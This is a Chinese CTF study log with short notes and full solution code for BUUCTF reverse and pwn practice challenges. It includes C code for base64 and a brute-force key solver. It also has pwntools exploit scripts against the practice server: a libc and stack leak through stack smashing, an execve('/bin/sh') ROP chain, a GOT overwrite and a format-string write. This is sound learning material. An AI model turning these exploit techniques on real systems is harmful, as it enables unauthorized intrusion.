21.08.08学习总结
Tags: learning experience
不知道什么时间-不知道什么时间: BUU刷题
re找门:
xor: 一个数xor同一个数两次之后仍然是其本身
reverse3: 一个base64的加密, 主函数里有个+i的操作, 把+i消去之后base64解密就行了, 但是因为是萌新第一次接触re的base64, 于是就自己写了个base64的加密与解密练手(ida的ctrl e是直接选取字符串)
helloword: jeb打开, 就能直接找到了
SimpleRev: 前面有几个"加密"是大小写转换, 后面的一个加密直接爆破就行了(欧对, ida的局部变量字符串给出来的是反的, 因为这个我前几次flag都是错的, 捏麻麻的)
[BJDCTF2020]JustRE: 啊这, 去年没做出来的题目发现shift f12就行了
PWN:
wdb2018_guess: 算是第一次做出涉及fork的题目? 先描述一下fork出来进程的一些特点偏移, canary啥的都不会变, 然后就可以爆破啦, 然后这道题由于是fork, 所以先用stack smashing泄露libc, 再把environ+libc_base写到__libc_argv[0]位置以直接获取栈地址, 最后通过计算栈上偏移再次覆盖__libc_argv[0]为存储flag的栈地址, 获取flag
picoctf_2018_can_you_gets_me: 用ropper直接生成就行了…
picoctf_2018_got_shell: 改got表, 懒得做
mrctf2020_easy_equation: z3获取judge值, 然后格式化改值就行了
exp:
Re:
reverse3(一个base64的加密解密):
#include <iostream>
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <ctype.h>
char base64_array[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
char * encode(char* ori)
{
char tmp[3] = "";
char * ori_code = ori;
int i = 0;
int ori_len = strlen(ori);
if (ori_len % 3) {
ori_len++;
}
int code_len = ori_len * 4;
int encode_code_cnt = 0;
char * encode_code = (char *)malloc(code_len + 1);
memset(encode_code, 0, strlen(encode_code));
char* begin_encode = encode_code;
while (code_len) {
for (i = 0; (i < 3 && ori_len>0); i++)
{
tmp[i] = *ori;
ori++;
ori_len--;
}
if (tmp[i - 1] == '\0')
{
i--;
}
/* 对末字节做处理 */
if (!i)
{
break;
}
switch (i)
{
/* 只能取得一个字节 */
case 1:
*(encode_code + (encode_code_cnt++)) = base64_array[(tmp[0] >> 2)];
*(encode_code + (encode_code_cnt++)) = base64_array[(tmp[0] & 3) * 16 + (tmp[1] >> 4)];
*(encode_code + (encode_code_cnt++)) = '=';
*(encode_code + (encode_code_cnt++)) = '=';
break;
/* 剩余两个字节 */
case 2:
*(encode_code + (encode_code_cnt++)) = base64_array[tmp[0] >> 2];
*(encode_code + (encode_code_cnt++)) = base64_array[(tmp[0] & 3) * 16 + (tmp[1] >> 4)];
*(encode_code + (encode_code_cnt++)) = base64_array[(tmp[1] & 0xf) * 4 + (tmp[2] >> 6)];
*(encode_code + (encode_code_cnt++)) = '=';
break;
/* 常规情况 */
case 3:
*(encode_code + (encode_code_cnt++)) = base64_array[tmp[0] >> 2];
*(encode_code + (encode_code_cnt++)) = base64_array[(tmp[0] & 3) * 16 + (tmp[1] >> 4)];
*(encode_code + (encode_code_cnt++)) = base64_array[(tmp[1] & 0xf) * 4 + (tmp[2] >> 6)];
*(encode_code + (encode_code_cnt++)) = base64_array[(tmp[2] & 0x3f)];
break;
default:
break;
}
}
*(encode_code + (++encode_code_cnt)) = '\0';
return begin_encode;
}
int list(char aa)
{
int a = 0;
for (a = 0; a < 64; a++)
{
if (base64_array[a] == aa)break;
}
return a;
}
char* decode(char* fin)
{
int fin_len = strlen(fin);
int fin_group = fin_len / 4;
int i = 0;
char* beg_fin = fin;
char* last = (char*)malloc(fin_group + 1);
char* retlast = last;
memset(last, NULL, strlen(last));
char tmp[4] = "";
int n[4] = {
0 };
while (fin_len)
{
for (i = 0; (i < 4 && fin_group > 0); i++)
{
tmp[i] = *fin;
fin++;
}
fin_group--;
if (!fin_group)
{
fin_len = 0;
for (i = 0; i < 4;)
{
i++;
if (tmp[i] == '=')
{
break;
}
}
}
switch (i)
{
case 1:
n[0] = list(tmp[0]);
*last = char((n[0] << 2));
break;
case 2:
n[0] = list(tmp[0]);
n[1] = list(tmp[1]);
*last = char((n[0] << 2) + ((n[1] >> 4) & 3));
last++;
*last = char((n[1] & 0xf) << 4);
break;
case 3:
n[0] = list(tmp[0]);
n[1] = list(tmp[1]);
n[2] = list(tmp[2]);
*last = char((n[0] << 2) + ((n[1] >> 4) & 3));
last++;
*last = char(((n[1] & 0xf) << 4) + ((n[2] >> 2) & 0xf));
last++;
*last = char((n[2] & 3) << 6);
break;
case 4:
n[0] = list(tmp[0]);
n[1] = list(tmp[1]);
n[2] = list(tmp[2]);
n[3] = list(tmp[3]);
*last = char((n[0] << 2) + ((n[1] >> 4) & 3));
last++;
*last = char(((n[1] & 0xf) << 4) + ((n[2] >> 2) & 0xf));
last++;
*last = char(((n[2] & 3) << 6) + (n[3] & 0x3f));
last++;
break;
default:
break;
}
}
return retlast;
}
int main()
{
char ori[] = "e3nifIH9b_C@n@dH";
//char* fin = encode(ori);
// printf("encode: %s", fin);
for (int i = 0; ori[i]; i++)
{
ori[i] -= i;
}
char* beg = decode(ori);
printf("\ndecode: %s", beg);
return 0;
}
SimpleRev::
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <ctype.h>
char key[128]={
NULL};
char key1[]="ADSFK";
char key2[];
char key3[]="kills";
char* text;
char* join(char* key, char* v)
{
int v2=strlen(key);
int v3=strlen(v);
char* dest=(char*)malloc(v2+v3+1);
if(!dest)exit(1);
strcpy(dest, key);
strcat(dest, v);
return dest;
}
int main()
{
char v9[]="hadow";
char src[]="NDCLS";
text=join(key3, v9);
strcpy(key, key1);
strcat(key, src);
printf("text: %s\n", text);
printf("key: %s\n", key);
int v5=strlen(key);
int v2=0;
int v3=0;
int i=0;
for(i=0;i<v5;++i)
{
if(key[v3%v5]>64&&key[v3%v5]<=90)
{
key[i]=key[v3%v5]+32;
}
v3++;
}
printf("key: %s\n", key);
int cnt=0;
char str2[100]={
NULL};
while(text[cnt])
{
int tmp=0;
char t;
int flag=0;
for(tmp=0x41;tmp<=0x5a;tmp++)
{
t=((char)tmp-39-key[v3%v5]+97)%26+97;
if(t==text[cnt]){
flag=1;
break;
}
}
if(flag)
{
str2[cnt]=(char)tmp;
v3++;
cnt++;
continue;
}
for(tmp='a';tmp<='z';tmp++)
{
t=((char)tmp-39-key[v3 % v5]+97)%26+97;
if(t==text[cnt]){
flag=1;
break;
}
}
if(flag)
{
str2[cnt]=(char)tmp;
v3++;
cnt++;
continue;
}
}
printf("flag{%s}", str2);
return 0;
}
Pwn:
wdb2018_guess:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./GUESS')
sh=remote('node4.buuoj.cn',28433)
elf=ELF('./GUESS')
libc=ELF('./libc/libc.so.6')
#libc=elf.libc
context.log_level='debug'
sh.recv()
payload1=p64(elf.got['puts'])*0x50
sh.sendline(payload1)
sh.recvuntil('stack smashing detected ***: ')
puts_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=puts_addr-libc.sym['puts']
log.success('libc base: '+hex(libc_base))
environ_addr=libc_base+libc.sym['environ']
sh.recv()
payload2=p64(environ_addr)*0x50
sh.sendline(payload2)
sh.recvuntil('stack smashing detected ***: ')
stack_addr=u64(sh.recv(6).ljust(8, '\x00'))
sh.recv()
payload3=p64(stack_addr-0x168)*0x50
sh.sendline(payload3)
print sh.recv()
sh.interactive()
picoctf_2018_can_you_gets_me:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # 0d55f76dca57a92650c686ea9d1e1cf111a10d921da1a5dec409ba1f5a716f08
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
sh=remote('node4.buuoj.cn',29325)
#sh=process('./PicoCTF_2018_can-you-gets-me')
sh.recv()
rop = 'a'*28
rop += rebase_0(0x000701c6) # 0x080b81c6: pop eax; ret;
rop += '//bi'
rop += rebase_0(0x0002702a) # 0x0806f02a: pop edx; ret;
rop += rebase_0(0x000a2060)
rop += rebase_0(0x0000c9db) # 0x080549db: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000701c6) # 0x080b81c6: pop eax; ret;
rop += 'n/sh'
rop += rebase_0(0x0002702a) # 0x0806f02a: pop edx; ret;
rop += rebase_0(0x000a2064)
rop += rebase_0(0x0000c9db) # 0x080549db: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000701c6) # 0x080b81c6: pop eax; ret;
rop += p(0x00000000)
rop += rebase_0(0x0002702a) # 0x0806f02a: pop edx; ret;
rop += rebase_0(0x000a2068)
rop += rebase_0(0x0000c9db) # 0x080549db: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret;
rop += rebase_0(0x000a2060)
rop += rebase_0(0x00096955) # 0x080de955: pop ecx; ret;
rop += rebase_0(0x000a2068)
rop += rebase_0(0x0002702a) # 0x0806f02a: pop edx; ret;
rop += rebase_0(0x000a2068)
rop += rebase_0(0x000701c6) # 0x080b81c6: pop eax; ret;
rop += p(0x0000000b)
rop += rebase_0(0x00027630) # 0x0806f630: int 0x80; ret;
sh.sendline(rop)
sh.interactive()
picoctf_2018_got_shell:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
r=remote('node4.buuoj.cn', 26201)
#r=process('./PicoCTF_2018_got-shell')
elf=ELF('./PicoCTF_2018_got-shell')
puts_got=elf.got['puts']
win_addr=elf.symbols['win']
r.recvuntil("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?")
r.sendline(hex(puts_got))
r.recv()
r.sendline(hex(win_addr))
r.interactive()
mrctf2020_easy_equation:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from z3 import *
context.log_level='debug'
#sh=process('./mrctf2020_easy_equation')
sh=remote('node4.buuoj.cn',28588)
elf=ELF('./mrctf2020_easy_equation')
context.binary=elf
def decode():
a1=Int('a1')
s=Solver()
s.add(-7*a1+11*a1*a1+17*a1*a1*a1*a1-13*a1*a1*a1==198)
print s.check()
result=s.model()
print "a1=%s" % result[a1]
return result[a1].as_long()
#gdb.attach(sh)
result=decode()
payload='a'+fmtstr_payload(8, {
0x60105C:result}, numbwritten=1)
sh.sendline(payload)
sh.interactive()